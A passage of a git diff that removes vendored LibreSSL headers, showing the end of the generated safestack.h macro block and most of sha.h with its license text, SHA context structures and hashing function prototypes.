-	SKM_ASN1_seq_pack(X509_ALGOR, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_ALGOR(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_ALGOR, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_ATTRIBUTE(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_ATTRIBUTE, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_ATTRIBUTE(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_ATTRIBUTE, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_ATTRIBUTE(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_ATTRIBUTE, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_ATTRIBUTE(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_ATTRIBUTE, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_CRL(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_CRL, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_CRL(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_CRL, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_CRL(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_CRL, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_CRL(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_CRL, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_EXTENSION(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_EXTENSION, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_EXTENSION(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_EXTENSION, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_EXTENSION(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_EXTENSION, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_EXTENSION(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_EXTENSION, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_NAME_ENTRY(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_NAME_ENTRY, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_NAME_ENTRY(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_NAME_ENTRY, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_NAME_ENTRY(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_NAME_ENTRY, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_NAME_ENTRY(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_NAME_ENTRY, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_REVOKED(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_REVOKED, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_REVOKED(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_REVOKED, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_REVOKED(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_REVOKED, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_REVOKED(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_REVOKED, (buf), (len), (d2i_func), (free_func))
-
-#define PKCS12_decrypt_d2i_PKCS12_SAFEBAG(algor, d2i_func, free_func, pass, passlen, oct, seq) \
-	SKM_PKCS12_decrypt_d2i(PKCS12_SAFEBAG, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
-
-#define PKCS12_decrypt_d2i_PKCS7(algor, d2i_func, free_func, pass, passlen, oct, seq) \
-	SKM_PKCS12_decrypt_d2i(PKCS7, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
-#endif /* !LIBRESSL_INTERNAL */
-
-#define lh_ADDED_OBJ_new() LHM_lh_new(ADDED_OBJ,added_obj)
-#define lh_ADDED_OBJ_insert(lh,inst) LHM_lh_insert(ADDED_OBJ,lh,inst)
-#define lh_ADDED_OBJ_retrieve(lh,inst) LHM_lh_retrieve(ADDED_OBJ,lh,inst)
-#define lh_ADDED_OBJ_delete(lh,inst) LHM_lh_delete(ADDED_OBJ,lh,inst)
-#define lh_ADDED_OBJ_doall(lh,fn) LHM_lh_doall(ADDED_OBJ,lh,fn)
-#define lh_ADDED_OBJ_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ADDED_OBJ,lh,fn,arg_type,arg)
-#define lh_ADDED_OBJ_error(lh) LHM_lh_error(ADDED_OBJ,lh)
-#define lh_ADDED_OBJ_num_items(lh) LHM_lh_num_items(ADDED_OBJ,lh)
-#define lh_ADDED_OBJ_down_load(lh) LHM_lh_down_load(ADDED_OBJ,lh)
-#define lh_ADDED_OBJ_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ADDED_OBJ,lh,out)
-#define lh_ADDED_OBJ_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ADDED_OBJ,lh,out)
-#define lh_ADDED_OBJ_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ADDED_OBJ,lh,out)
-#define lh_ADDED_OBJ_free(lh) LHM_lh_free(ADDED_OBJ,lh)
-
-#define lh_APP_INFO_new() LHM_lh_new(APP_INFO,app_info)
-#define lh_APP_INFO_insert(lh,inst) LHM_lh_insert(APP_INFO,lh,inst)
-#define lh_APP_INFO_retrieve(lh,inst) LHM_lh_retrieve(APP_INFO,lh,inst)
-#define lh_APP_INFO_delete(lh,inst) LHM_lh_delete(APP_INFO,lh,inst)
-#define lh_APP_INFO_doall(lh,fn) LHM_lh_doall(APP_INFO,lh,fn)
-#define lh_APP_INFO_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(APP_INFO,lh,fn,arg_type,arg)
-#define lh_APP_INFO_error(lh) LHM_lh_error(APP_INFO,lh)
-#define lh_APP_INFO_num_items(lh) LHM_lh_num_items(APP_INFO,lh)
-#define lh_APP_INFO_down_load(lh) LHM_lh_down_load(APP_INFO,lh)
-#define lh_APP_INFO_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(APP_INFO,lh,out)
-#define lh_APP_INFO_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(APP_INFO,lh,out)
-#define lh_APP_INFO_stats_bio(lh,out) \
-  LHM_lh_stats_bio(APP_INFO,lh,out)
-#define lh_APP_INFO_free(lh) LHM_lh_free(APP_INFO,lh)
-
-#define lh_CONF_VALUE_new() LHM_lh_new(CONF_VALUE,conf_value)
-#define lh_CONF_VALUE_insert(lh,inst) LHM_lh_insert(CONF_VALUE,lh,inst)
-#define lh_CONF_VALUE_retrieve(lh,inst) LHM_lh_retrieve(CONF_VALUE,lh,inst)
-#define lh_CONF_VALUE_delete(lh,inst) LHM_lh_delete(CONF_VALUE,lh,inst)
-#define lh_CONF_VALUE_doall(lh,fn) LHM_lh_doall(CONF_VALUE,lh,fn)
-#define lh_CONF_VALUE_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(CONF_VALUE,lh,fn,arg_type,arg)
-#define lh_CONF_VALUE_error(lh) LHM_lh_error(CONF_VALUE,lh)
-#define lh_CONF_VALUE_num_items(lh) LHM_lh_num_items(CONF_VALUE,lh)
-#define lh_CONF_VALUE_down_load(lh) LHM_lh_down_load(CONF_VALUE,lh)
-#define lh_CONF_VALUE_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(CONF_VALUE,lh,out)
-#define lh_CONF_VALUE_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(CONF_VALUE,lh,out)
-#define lh_CONF_VALUE_stats_bio(lh,out) \
-  LHM_lh_stats_bio(CONF_VALUE,lh,out)
-#define lh_CONF_VALUE_free(lh) LHM_lh_free(CONF_VALUE,lh)
-
-#define lh_ENGINE_PILE_new() LHM_lh_new(ENGINE_PILE,engine_pile)
-#define lh_ENGINE_PILE_insert(lh,inst) LHM_lh_insert(ENGINE_PILE,lh,inst)
-#define lh_ENGINE_PILE_retrieve(lh,inst) LHM_lh_retrieve(ENGINE_PILE,lh,inst)
-#define lh_ENGINE_PILE_delete(lh,inst) LHM_lh_delete(ENGINE_PILE,lh,inst)
-#define lh_ENGINE_PILE_doall(lh,fn) LHM_lh_doall(ENGINE_PILE,lh,fn)
-#define lh_ENGINE_PILE_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ENGINE_PILE,lh,fn,arg_type,arg)
-#define lh_ENGINE_PILE_error(lh) LHM_lh_error(ENGINE_PILE,lh)
-#define lh_ENGINE_PILE_num_items(lh) LHM_lh_num_items(ENGINE_PILE,lh)
-#define lh_ENGINE_PILE_down_load(lh) LHM_lh_down_load(ENGINE_PILE,lh)
-#define lh_ENGINE_PILE_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ENGINE_PILE,lh,out)
-#define lh_ENGINE_PILE_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ENGINE_PILE,lh,out)
-#define lh_ENGINE_PILE_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ENGINE_PILE,lh,out)
-#define lh_ENGINE_PILE_free(lh) LHM_lh_free(ENGINE_PILE,lh)
-
-#define lh_ERR_STATE_new() LHM_lh_new(ERR_STATE,err_state)
-#define lh_ERR_STATE_insert(lh,inst) LHM_lh_insert(ERR_STATE,lh,inst)
-#define lh_ERR_STATE_retrieve(lh,inst) LHM_lh_retrieve(ERR_STATE,lh,inst)
-#define lh_ERR_STATE_delete(lh,inst) LHM_lh_delete(ERR_STATE,lh,inst)
-#define lh_ERR_STATE_doall(lh,fn) LHM_lh_doall(ERR_STATE,lh,fn)
-#define lh_ERR_STATE_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ERR_STATE,lh,fn,arg_type,arg)
-#define lh_ERR_STATE_error(lh) LHM_lh_error(ERR_STATE,lh)
-#define lh_ERR_STATE_num_items(lh) LHM_lh_num_items(ERR_STATE,lh)
-#define lh_ERR_STATE_down_load(lh) LHM_lh_down_load(ERR_STATE,lh)
-#define lh_ERR_STATE_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ERR_STATE,lh,out)
-#define lh_ERR_STATE_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ERR_STATE,lh,out)
-#define lh_ERR_STATE_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ERR_STATE,lh,out)
-#define lh_ERR_STATE_free(lh) LHM_lh_free(ERR_STATE,lh)
-
-#define lh_ERR_STRING_DATA_new() LHM_lh_new(ERR_STRING_DATA,err_string_data)
-#define lh_ERR_STRING_DATA_insert(lh,inst) LHM_lh_insert(ERR_STRING_DATA,lh,inst)
-#define lh_ERR_STRING_DATA_retrieve(lh,inst) LHM_lh_retrieve(ERR_STRING_DATA,lh,inst)
-#define lh_ERR_STRING_DATA_delete(lh,inst) LHM_lh_delete(ERR_STRING_DATA,lh,inst)
-#define lh_ERR_STRING_DATA_doall(lh,fn) LHM_lh_doall(ERR_STRING_DATA,lh,fn)
-#define lh_ERR_STRING_DATA_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ERR_STRING_DATA,lh,fn,arg_type,arg)
-#define lh_ERR_STRING_DATA_error(lh) LHM_lh_error(ERR_STRING_DATA,lh)
-#define lh_ERR_STRING_DATA_num_items(lh) LHM_lh_num_items(ERR_STRING_DATA,lh)
-#define lh_ERR_STRING_DATA_down_load(lh) LHM_lh_down_load(ERR_STRING_DATA,lh)
-#define lh_ERR_STRING_DATA_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ERR_STRING_DATA,lh,out)
-#define lh_ERR_STRING_DATA_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ERR_STRING_DATA,lh,out)
-#define lh_ERR_STRING_DATA_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ERR_STRING_DATA,lh,out)
-#define lh_ERR_STRING_DATA_free(lh) LHM_lh_free(ERR_STRING_DATA,lh)
-
-#define lh_EX_CLASS_ITEM_new() LHM_lh_new(EX_CLASS_ITEM,ex_class_item)
-#define lh_EX_CLASS_ITEM_insert(lh,inst) LHM_lh_insert(EX_CLASS_ITEM,lh,inst)
-#define lh_EX_CLASS_ITEM_retrieve(lh,inst) LHM_lh_retrieve(EX_CLASS_ITEM,lh,inst)
-#define lh_EX_CLASS_ITEM_delete(lh,inst) LHM_lh_delete(EX_CLASS_ITEM,lh,inst)
-#define lh_EX_CLASS_ITEM_doall(lh,fn) LHM_lh_doall(EX_CLASS_ITEM,lh,fn)
-#define lh_EX_CLASS_ITEM_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(EX_CLASS_ITEM,lh,fn,arg_type,arg)
-#define lh_EX_CLASS_ITEM_error(lh) LHM_lh_error(EX_CLASS_ITEM,lh)
-#define lh_EX_CLASS_ITEM_num_items(lh) LHM_lh_num_items(EX_CLASS_ITEM,lh)
-#define lh_EX_CLASS_ITEM_down_load(lh) LHM_lh_down_load(EX_CLASS_ITEM,lh)
-#define lh_EX_CLASS_ITEM_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(EX_CLASS_ITEM,lh,out)
-#define lh_EX_CLASS_ITEM_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(EX_CLASS_ITEM,lh,out)
-#define lh_EX_CLASS_ITEM_stats_bio(lh,out) \
-  LHM_lh_stats_bio(EX_CLASS_ITEM,lh,out)
-#define lh_EX_CLASS_ITEM_free(lh) LHM_lh_free(EX_CLASS_ITEM,lh)
-
-#define lh_FUNCTION_new() LHM_lh_new(FUNCTION,function)
-#define lh_FUNCTION_insert(lh,inst) LHM_lh_insert(FUNCTION,lh,inst)
-#define lh_FUNCTION_retrieve(lh,inst) LHM_lh_retrieve(FUNCTION,lh,inst)
-#define lh_FUNCTION_delete(lh,inst) LHM_lh_delete(FUNCTION,lh,inst)
-#define lh_FUNCTION_doall(lh,fn) LHM_lh_doall(FUNCTION,lh,fn)
-#define lh_FUNCTION_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(FUNCTION,lh,fn,arg_type,arg)
-#define lh_FUNCTION_error(lh) LHM_lh_error(FUNCTION,lh)
-#define lh_FUNCTION_num_items(lh) LHM_lh_num_items(FUNCTION,lh)
-#define lh_FUNCTION_down_load(lh) LHM_lh_down_load(FUNCTION,lh)
-#define lh_FUNCTION_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(FUNCTION,lh,out)
-#define lh_FUNCTION_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(FUNCTION,lh,out)
-#define lh_FUNCTION_stats_bio(lh,out) \
-  LHM_lh_stats_bio(FUNCTION,lh,out)
-#define lh_FUNCTION_free(lh) LHM_lh_free(FUNCTION,lh)
-
-#define lh_MEM_new() LHM_lh_new(MEM,mem)
-#define lh_MEM_insert(lh,inst) LHM_lh_insert(MEM,lh,inst)
-#define lh_MEM_retrieve(lh,inst) LHM_lh_retrieve(MEM,lh,inst)
-#define lh_MEM_delete(lh,inst) LHM_lh_delete(MEM,lh,inst)
-#define lh_MEM_doall(lh,fn) LHM_lh_doall(MEM,lh,fn)
-#define lh_MEM_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(MEM,lh,fn,arg_type,arg)
-#define lh_MEM_error(lh) LHM_lh_error(MEM,lh)
-#define lh_MEM_num_items(lh) LHM_lh_num_items(MEM,lh)
-#define lh_MEM_down_load(lh) LHM_lh_down_load(MEM,lh)
-#define lh_MEM_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(MEM,lh,out)
-#define lh_MEM_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(MEM,lh,out)
-#define lh_MEM_stats_bio(lh,out) \
-  LHM_lh_stats_bio(MEM,lh,out)
-#define lh_MEM_free(lh) LHM_lh_free(MEM,lh)
-
-#define lh_OBJ_NAME_new() LHM_lh_new(OBJ_NAME,obj_name)
-#define lh_OBJ_NAME_insert(lh,inst) LHM_lh_insert(OBJ_NAME,lh,inst)
-#define lh_OBJ_NAME_retrieve(lh,inst) LHM_lh_retrieve(OBJ_NAME,lh,inst)
-#define lh_OBJ_NAME_delete(lh,inst) LHM_lh_delete(OBJ_NAME,lh,inst)
-#define lh_OBJ_NAME_doall(lh,fn) LHM_lh_doall(OBJ_NAME,lh,fn)
-#define lh_OBJ_NAME_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(OBJ_NAME,lh,fn,arg_type,arg)
-#define lh_OBJ_NAME_error(lh) LHM_lh_error(OBJ_NAME,lh)
-#define lh_OBJ_NAME_num_items(lh) LHM_lh_num_items(OBJ_NAME,lh)
-#define lh_OBJ_NAME_down_load(lh) LHM_lh_down_load(OBJ_NAME,lh)
-#define lh_OBJ_NAME_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(OBJ_NAME,lh,out)
-#define lh_OBJ_NAME_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(OBJ_NAME,lh,out)
-#define lh_OBJ_NAME_stats_bio(lh,out) \
-  LHM_lh_stats_bio(OBJ_NAME,lh,out)
-#define lh_OBJ_NAME_free(lh) LHM_lh_free(OBJ_NAME,lh)
-
-#define lh_OPENSSL_CSTRING_new() LHM_lh_new(OPENSSL_CSTRING,openssl_cstring)
-#define lh_OPENSSL_CSTRING_insert(lh,inst) LHM_lh_insert(OPENSSL_CSTRING,lh,inst)
-#define lh_OPENSSL_CSTRING_retrieve(lh,inst) LHM_lh_retrieve(OPENSSL_CSTRING,lh,inst)
-#define lh_OPENSSL_CSTRING_delete(lh,inst) LHM_lh_delete(OPENSSL_CSTRING,lh,inst)
-#define lh_OPENSSL_CSTRING_doall(lh,fn) LHM_lh_doall(OPENSSL_CSTRING,lh,fn)
-#define lh_OPENSSL_CSTRING_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(OPENSSL_CSTRING,lh,fn,arg_type,arg)
-#define lh_OPENSSL_CSTRING_error(lh) LHM_lh_error(OPENSSL_CSTRING,lh)
-#define lh_OPENSSL_CSTRING_num_items(lh) LHM_lh_num_items(OPENSSL_CSTRING,lh)
-#define lh_OPENSSL_CSTRING_down_load(lh) LHM_lh_down_load(OPENSSL_CSTRING,lh)
-#define lh_OPENSSL_CSTRING_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(OPENSSL_CSTRING,lh,out)
-#define lh_OPENSSL_CSTRING_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(OPENSSL_CSTRING,lh,out)
-#define lh_OPENSSL_CSTRING_stats_bio(lh,out) \
-  LHM_lh_stats_bio(OPENSSL_CSTRING,lh,out)
-#define lh_OPENSSL_CSTRING_free(lh) LHM_lh_free(OPENSSL_CSTRING,lh)
-
-#define lh_OPENSSL_STRING_new() LHM_lh_new(OPENSSL_STRING,openssl_string)
-#define lh_OPENSSL_STRING_insert(lh,inst) LHM_lh_insert(OPENSSL_STRING,lh,inst)
-#define lh_OPENSSL_STRING_retrieve(lh,inst) LHM_lh_retrieve(OPENSSL_STRING,lh,inst)
-#define lh_OPENSSL_STRING_delete(lh,inst) LHM_lh_delete(OPENSSL_STRING,lh,inst)
-#define lh_OPENSSL_STRING_doall(lh,fn) LHM_lh_doall(OPENSSL_STRING,lh,fn)
-#define lh_OPENSSL_STRING_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(OPENSSL_STRING,lh,fn,arg_type,arg)
-#define lh_OPENSSL_STRING_error(lh) LHM_lh_error(OPENSSL_STRING,lh)
-#define lh_OPENSSL_STRING_num_items(lh) LHM_lh_num_items(OPENSSL_STRING,lh)
-#define lh_OPENSSL_STRING_down_load(lh) LHM_lh_down_load(OPENSSL_STRING,lh)
-#define lh_OPENSSL_STRING_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(OPENSSL_STRING,lh,out)
-#define lh_OPENSSL_STRING_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(OPENSSL_STRING,lh,out)
-#define lh_OPENSSL_STRING_stats_bio(lh,out) \
-  LHM_lh_stats_bio(OPENSSL_STRING,lh,out)
-#define lh_OPENSSL_STRING_free(lh) LHM_lh_free(OPENSSL_STRING,lh)
-
-#define lh_SSL_SESSION_new() LHM_lh_new(SSL_SESSION,ssl_session)
-#define lh_SSL_SESSION_insert(lh,inst) LHM_lh_insert(SSL_SESSION,lh,inst)
-#define lh_SSL_SESSION_retrieve(lh,inst) LHM_lh_retrieve(SSL_SESSION,lh,inst)
-#define lh_SSL_SESSION_delete(lh,inst) LHM_lh_delete(SSL_SESSION,lh,inst)
-#define lh_SSL_SESSION_doall(lh,fn) LHM_lh_doall(SSL_SESSION,lh,fn)
-#define lh_SSL_SESSION_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(SSL_SESSION,lh,fn,arg_type,arg)
-#define lh_SSL_SESSION_error(lh) LHM_lh_error(SSL_SESSION,lh)
-#define lh_SSL_SESSION_num_items(lh) LHM_lh_num_items(SSL_SESSION,lh)
-#define lh_SSL_SESSION_down_load(lh) LHM_lh_down_load(SSL_SESSION,lh)
-#define lh_SSL_SESSION_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(SSL_SESSION,lh,out)
-#define lh_SSL_SESSION_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(SSL_SESSION,lh,out)
-#define lh_SSL_SESSION_stats_bio(lh,out) \
-  LHM_lh_stats_bio(SSL_SESSION,lh,out)
-#define lh_SSL_SESSION_free(lh) LHM_lh_free(SSL_SESSION,lh)
-/* End of util/mkstack.pl block, you may now edit :-) */
-
-#endif /* !defined HEADER_SAFESTACK_H */
diff --git a/thirdparty/libressl/include/openssl/sha.h b/thirdparty/libressl/include/openssl/sha.h
deleted file mode 100644
index 87fdf8d..0000000
--- a/thirdparty/libressl/include/openssl/sha.h
+++ /dev/null
@@ -1,192 +0,0 @@
-/* $OpenBSD: sha.h,v 1.21 2015/09/13 21:09:56 doug Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_SHA_H
-#define HEADER_SHA_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA1)
-#error SHA is disabled.
-#endif
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! SHA_LONG has to be at least 32 bits wide.                    !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define SHA_LONG unsigned int
-
-#define SHA_LBLOCK	16
-#define SHA_CBLOCK	(SHA_LBLOCK*4)	/* SHA treats input data as a
-					 * contiguous array of 32 bit
-					 * wide big-endian values. */
-#define SHA_LAST_BLOCK  (SHA_CBLOCK-8)
-#define SHA_DIGEST_LENGTH 20
-
-typedef struct SHAstate_st
-	{
-	SHA_LONG h0,h1,h2,h3,h4;
-	SHA_LONG Nl,Nh;
-	SHA_LONG data[SHA_LBLOCK];
-	unsigned int num;
-	} SHA_CTX;
-
-#ifndef OPENSSL_NO_SHA1
-int SHA1_Init(SHA_CTX *c);
-int SHA1_Update(SHA_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA1_Final(unsigned char *md, SHA_CTX *c);
-unsigned char *SHA1(const unsigned char *d, size_t n, unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void SHA1_Transform(SHA_CTX *c, const unsigned char *data);
-#endif
-
-#define SHA256_CBLOCK	(SHA_LBLOCK*4)	/* SHA-256 treats input data as a
-					 * contiguous array of 32 bit
-					 * wide big-endian values. */
-#define SHA224_DIGEST_LENGTH	28
-#define SHA256_DIGEST_LENGTH	32
-
-typedef struct SHA256state_st
-	{
-	SHA_LONG h[8];
-	SHA_LONG Nl,Nh;
-	SHA_LONG data[SHA_LBLOCK];
-	unsigned int num,md_len;
-	} SHA256_CTX;
-
-#ifndef OPENSSL_NO_SHA256
-int SHA224_Init(SHA256_CTX *c);
-int SHA224_Update(SHA256_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA224_Final(unsigned char *md, SHA256_CTX *c);
-unsigned char *SHA224(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-int SHA256_Init(SHA256_CTX *c);
-int SHA256_Update(SHA256_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA256_Final(unsigned char *md, SHA256_CTX *c);
-unsigned char *SHA256(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void SHA256_Transform(SHA256_CTX *c, const unsigned char *data);
-#endif
-
-#define SHA384_DIGEST_LENGTH	48
-#define SHA512_DIGEST_LENGTH	64
-
-#ifndef OPENSSL_NO_SHA512
-/*
- * Unlike 32-bit digest algorithms, SHA-512 *relies* on SHA_LONG64
- * being exactly 64-bit wide. See Implementation Notes in sha512.c
- * for further details.
- */
-#define SHA512_CBLOCK	(SHA_LBLOCK*8)	/* SHA-512 treats input data as a
-					 * contiguous array of 64 bit
-					 * wide big-endian values. */
-#if defined(_LP64)
-#define SHA_LONG64 unsigned long
-#define U64(C)     C##UL
-#else
-#define SHA_LONG64 unsigned long long
